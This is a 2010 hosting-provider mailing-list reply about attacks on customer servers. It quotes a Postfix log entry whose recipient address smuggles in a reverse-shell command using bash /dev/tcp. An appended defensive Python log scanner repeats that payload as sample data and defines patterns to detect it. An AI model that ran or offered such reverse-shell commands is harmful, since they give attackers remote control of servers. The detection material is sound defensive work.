Re: [bitfolk] Security - not just SSH

Author: Andy Smith
Date:  
To: users
Subject: Re: [bitfolk] Security - not just SSH

gpg: Signature made Thu Mar 18 13:49:32 2010 UTC using DSA key ID BF15490B
gpg: Good signature from "Andy Smith <andy@strugglers.net>"
gpg: aka "Andrew James Smith <andy@strugglers.net>"
gpg: aka "Andy Smith (UKUUG) <andy.smith@ukuug.org>"
gpg: aka "Andy Smith (BitFolk Ltd.) <andy@bitfolk.com>"
gpg: aka "Andy Smith (Linux User Groups UK) <andy@lug.org.uk>"
gpg: aka "Andy Smith (Cernio Technology Cooperative) <andy.smith@cernio.com>"
Hello,

On Thu, Mar 18, 2010 at 07:47:03AM +0000, Alastair Sherringham wrote:
> With all the talk about SSH security, it is also shocking to see the
> break-in attempts made on other services e.g. httpd and smtpd.

The next most common set of compromises I see amongst BitFolk's
customers are incorrect configurations of Apache and/or Squid as
wide open proxies, which are found by routine scanning and then used
to do blog comment spam.

HTTP probes for URLs of applications that have had bugs, e.g.
WordPress, Gallery, phpMyAdmin, followed by an attempt to exploit
those bugs, are regularly seen by me, although I can't recall having
seen a customer's VPS made to do anything nasty by one of these
routes. It's probably happened, though.

> an odd record in the Postfix log today was a little different:
>
> X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0 2>&0"
> Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0 2>&0"@calliope.bitfolk

How odd. I assume it's trying to exploit some sort of sendmail bug
which must be very old, but then also uses bash's /dev/tcp support
which I thought was quite recent. Not seen one like that before!

Cheers,
Andy

-- 
http://bitfolk.com/ -- No-nonsense VPS hosting
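One defensive check that follows from the log record Alastair quoted, as an added example that is not part of the original thread: a small Python scanner over constructed Postfix delivery log lines that flags recipient local parts carrying shell-command indicators (an alias-style pipe, bash's /dev/tcp, a shell path, I/O redirection). The log layout, hostnames, queue IDs and the TEST-NET address are assumptions made for the example.

```python
import re
from typing import Dict, List

# Constructed Postfix delivery log lines for this example; hostnames, queue IDs
# and the 192.0.2.x addresses (TEST-NET) are made up, not from a real mail server.
SAMPLE_LOG = [
    "Mar 18 07:40:12 mx postfix/local[2345]: 5A1B2C3D4E: "
    "to=<\"root+:|exec /bin/sh 0</dev/tcp/192.0.2.10/9991 1>&0 2>&0\"@mx.example>, "
    "relay=local, delay=0.1, status=sent (delivered to mailbox)",
    "Mar 18 07:41:03 mx postfix/local[2346]: 6B2C3D4E5F: "
    "to=<alice+newsletter@mx.example>, relay=local, delay=0.2, status=sent",
    "Mar 18 07:42:30 mx postfix/smtp[2350]: 7C3D4E5F6A: "
    "to=<bob@example.org>, relay=mail.example.org[192.0.2.25]:25, status=sent",
]

# The payload itself contains '>' (1>&0), so a naive <...> match would stop early;
# anchor on the ", relay=" or ", orig_to=" Postfix writes right after the address.
RCPT_RE = re.compile(r"postfix/\S+: (\w+): to=<(.*?)>, (?:orig_to|relay)=")

# Things a legitimate local part has no reason to contain.
SHELL_INDICATORS = {
    "pipe-to-command": re.compile(r"(?:^|[+:])\|"),   # '|' where an alias pipe would sit
    "bash-dev-tcp": re.compile(r"/dev/(?:tcp|udp)/"),
    "shell-binary": re.compile(r"/bin/(?:ba)?sh\b"),
    "io-redirection": re.compile(r"[<>]"),
    "command-substitution": re.compile(r"`|\$\("),
}


def local_part(address: str) -> str:
    """Return the local part of an address, without surrounding RFC 5321 quotes."""
    local, sep, _domain = address.rpartition("@")
    return (local if sep else address).strip('"')


def suspicious_recipients(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per log line whose recipient local part looks like a shell command."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = RCPT_RE.search(line)
        if not m:
            continue
        queue_id, address = m.group(1), m.group(2)
        reasons = [name for name, rx in SHELL_INDICATORS.items() if rx.search(local_part(address))]
        if reasons:
            findings.append({"queue_id": queue_id, "recipient": address, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_recipients(SAMPLE_LOG):
        print(f["queue_id"], f["reasons"], f["recipient"])
```

Pointing it at the real mail log (or feeding it from a log shipper) turns the odd record Alastair spotted by eye into something that alerts on its own.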